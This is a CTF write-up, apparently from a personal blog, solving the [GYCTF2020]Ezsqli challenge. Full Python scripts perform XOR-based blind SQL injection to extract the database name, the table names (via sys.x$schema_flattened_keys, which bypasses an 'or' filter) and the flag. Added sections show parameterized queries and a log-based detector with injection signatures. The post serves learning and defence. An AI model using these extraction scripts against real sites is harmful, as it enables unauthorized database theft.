Z1d10tのBlog

A note for myself, have fun!

  1. Dumping the database name
  2. Dumping the table name
  3. Dumping the flag

[GYCTF2020]Ezsqli

One look is enough: this is a blind SQL injection.

Dumping the database name:

```python
import requests  # load the requests module
import time

url = 'http://b5c5750a-2950-4463-bba1-7eb101bc3c20.node4.buuoj.cn:81/'
# payload = {"id":"0^(ascii(substr((select database()),1,1))>97)"}
database = ''
for i in range(1, 25):
    for j in range(31, 128):
        # 0^(...) evaluates to 1 only when the comparison inside the parentheses is true
        payload = {"id": "0^(ascii(substr((select database()),{},1))={})".format(i, j)}
        r = requests.post(url, data=payload)
        time.sleep(0.005)
        if 'Nu1L' in r.text:  # 'Nu1L' in the response means the condition held
            database += chr(j)
            print(database)
            break  # character found, move on to the next position
# database name dumped: give_grandpa_pa_pa_pa
```


The database name actually isn't needed: `database()` can be used in its place from here on. Besides, `and` is filtered as well, so the name give_grandpa_pa_pa_pa couldn't be used directly anyway.

Dumping the table name:

Because `or` is filtered,

`information_schema` cannot be used for the query (its name contains `or`), so `sys.x$schema_flattened_keys` is used instead.

Reference: https://nosec.org/home/detail/3830.html
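The keyword filter in this challenge is the real lesson for a developer: blocking `and`/`or` does nothing against a `0^(...)` probe, because the input still reaches the SQL parser. The following is an added example (not the challenge's code): a hypothetical blacklist modelled on the filter described above, a vulnerable lookup that concatenates the `id` value into the query, and a parameterized lookup where the same value is bound as data. It uses an in-memory SQLite table constructed for the demo; SQLite has no `^` operator, so the vulnerable path surfaces the injected payload as a parse error, which is enough to show that the blacklist let it through.

```python
import re
import sqlite3

# Constructed demo table; not the challenge's schema.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT)")
conn.executemany("INSERT INTO users VALUES (?, ?)", [(1, "Nu1L"), (2, "V&N")])
conn.commit()

# The first probe from the writeup, used here as the test input.
PROBE = "0^(ascii(substr((select database()),1,1))=103)"

# Hypothetical blacklist in the spirit of the challenge filter: rejects the words and/or only.
BLOCKED = re.compile(r"\b(and|or)\b", re.IGNORECASE)


def is_blocked(user_input: str) -> bool:
    """True when the naive keyword filter would reject the input."""
    return BLOCKED.search(user_input) is not None


def lookup_vulnerable(user_input: str):
    """String concatenation: anything that survives the blacklist is parsed as SQL."""
    if is_blocked(user_input):
        return "blocked"
    try:
        row = conn.execute("SELECT name FROM users WHERE id = " + user_input).fetchone()
    except sqlite3.OperationalError:
        # The input reached the SQL parser; on MySQL the same string would simply execute.
        return "parsed-as-sql"
    return row[0] if row else None


def lookup_safe(user_input: str):
    """Parameter binding: the input is a value, never SQL, so no blacklist is needed."""
    row = conn.execute("SELECT name FROM users WHERE id = ?", (user_input,)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    for value in ("1", "1 or 1=1", PROBE):
        print(repr(value), "->", lookup_vulnerable(value), "|", lookup_safe(value))
```

With a bound parameter the probe string is compared against the integer `id` column as a literal, matches nothing, and the application's response carries no information about the database at all.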

```python
import requests  # load the requests module
import time

url = 'http://b5c5750a-2950-4463-bba1-7eb101bc3c20.node4.buuoj.cn:81/'
# payload = {"id":"0^ascii(substr((select group_concat(table_name)from sys.x$schema_flattened_keys where table_schema=database()),1,1))<103"}
tables = ''
for i in range(1, 50):
    for j in range(31, 128):  # printable ASCII range (the original had a typo, range(31,12))
        payload = {"id": "0^(ascii(substr((select group_concat(table_name)from sys.x$schema_flattened_keys where table_schema=database()),{},1))={})".format(i, j)}
        r = requests.post(url, data=payload)
        time.sleep(0.005)
        if 'Nu1L' in r.text:  # condition true: this is the character at position i
            tables += chr(j)
            print(tables)
            break
```


Improved with binary search:

```python
import requests  # load the requests module
import time

url = 'http://b5c5750a-2950-4463-bba1-7eb101bc3c20.node4.buuoj.cn:81/'
tables = ""
for i in range(1, 50):
    low = 31
    high = 127
    mid = (low + high) // 2
    while low <= high:
        payload = {"id": "0^(ascii(substr((select group_concat(table_name)from sys.x$schema_flattened_keys where table_schema=database()),{},1))>{})".format(i, mid)}
        r = requests.post(url, data=payload)
        if "Nu1L" in r.text:  # character code is greater than mid
            low = mid + 1
        else:                  # character code is at most mid
            high = mid - 1
        mid = (low + high) // 2
    tables += chr(high + 1)  # the loop ends with low == high + 1 == the character code
    print(tables)
    time.sleep(0.3)
```

Dumping the flag

Here a row (tuple) comparison is used to test the flag one character at a time.


`0^((1,'{0}')>(select * from f1ag_1s_h3r3_hhhhh))`: the 1 is a guess that the first column is usually an index id equal to 1, so 1 is used here. After that it is a matter of writing a script to test characters one by one; the script has to prepend the characters already recovered before each comparison.

```python
import requests  # load the requests module
import time

url = 'http://b5c5750a-2950-4463-bba1-7eb101bc3c20.node4.buuoj.cn:81/'
flag = ""
for i in range(1, 50):
    low = 31
    high = 127
    mid = (low + high) // 2
    while low <= high:
        flag_1 = flag + chr(mid)  # known prefix plus the candidate character
        payload = {"id": "0^((1,'{0}')>(select * from f1ag_1s_h3r3_hhhhh))".format(flag_1)}
        r = requests.post(url, data=payload)
        if "Nu1L" in r.text:  # guess sorts after the real value: the true character is below mid
            high = mid - 1
        else:                  # guess sorts at or before it: the true character is mid or above
            low = mid + 1
        mid = (low + high) // 2
    print(flag, chr(high))
    flag += chr(high)  # the loop ends with high == the character code
    time.sleep(2)
```
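Seen from the server side, all three stages of this writeup (the `ascii(substr(...))` probes, the `sys.x$schema_flattened_keys` enumeration, and the `(1,'...')>(select * from ...)` row comparison) share one shape: hundreds of POSTs from one client whose `id` value is an expression rather than a number. The following is an added example, not part of the original post, that runs signature matching over a constructed access-log excerpt (the request bodies are appended as `body=` purely for the demo; a real access log would need the body from a WAF or application log) and reports clients with several flagged requests.

```python
import re
from collections import Counter, defaultdict

# Constructed log excerpt in an Apache-like format with the decoded POST body appended.
LOG_LINES = [
    '10.0.0.5 - - [01/Jan/2024:12:00:01 +0000] "POST / HTTP/1.1" 200 512 body=id=1',
    '10.0.0.9 - - [01/Jan/2024:12:00:02 +0000] "POST / HTTP/1.1" 200 512 body=id=0^(ascii(substr((select database()),1,1))=103)',
    '10.0.0.9 - - [01/Jan/2024:12:00:02 +0000] "POST / HTTP/1.1" 200 512 body=id=0^(ascii(substr((select database()),2,1))=105)',
    '10.0.0.9 - - [01/Jan/2024:12:00:03 +0000] "POST / HTTP/1.1" 200 512 body=id=0^(ascii(substr((select group_concat(table_name)from sys.x$schema_flattened_keys where table_schema=database()),1,1))>79)',
    "10.0.0.9 - - [01/Jan/2024:12:00:04 +0000] \"POST / HTTP/1.1\" 200 512 body=id=0^((1,'f')>(select * from f1ag_1s_h3r3_hhhhh))",
    '10.0.0.5 - - [01/Jan/2024:12:00:05 +0000] "POST / HTTP/1.1" 200 512 body=id=2',
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) body=(?P<body>.*)$'
)

# Signatures derived from the payload families used in the writeup.
SIGNATURES = {
    "xor_boolean": re.compile(r"\b0\s*\^\s*\(", re.I),
    "char_probe": re.compile(r"ascii\s*\(\s*substr\s*\(", re.I),
    "schema_enum": re.compile(r"information_schema|sys\.x\$schema_flattened_keys", re.I),
    "row_compare": re.compile(r"\(\s*\d+\s*,\s*'[^']*'\s*\)\s*[<>]=?\s*\(\s*select\b", re.I),
}


def parse_line(line):
    """Return the log fields as a dict, or None for lines that do not match the format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(body):
    """Names of every signature that matches the request body (empty set for benign input)."""
    return {name for name, rx in SIGNATURES.items() if rx.search(body)}


def summarize(lines):
    """Per client: how many requests were flagged ('_requests') and which signatures fired."""
    per_ip = defaultdict(Counter)
    for line in lines:
        rec = parse_line(line)
        if not rec:
            continue
        tags = classify(rec["body"])
        if tags:
            per_ip[rec["ip"]]["_requests"] += 1
            per_ip[rec["ip"]].update(tags)
    return per_ip


def suspicious_clients(lines, min_requests=3):
    """Clients whose flagged-request count reaches the threshold, sorted for stable output."""
    return sorted(ip for ip, c in summarize(lines).items() if c["_requests"] >= min_requests)


if __name__ == "__main__":
    for ip, counts in summarize(LOG_LINES).items():
        print(ip, dict(counts))
    print("suspicious:", suspicious_clients(LOG_LINES))
```

The threshold matters more than any single signature: a boolean-blind extraction needs one request per bit of information, so even a binary-search variant that only sends a few dozen requests per character stands out against a client that sends one numeric `id` per page view.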


This post was last updated  days ago; the information described in it may have changed since.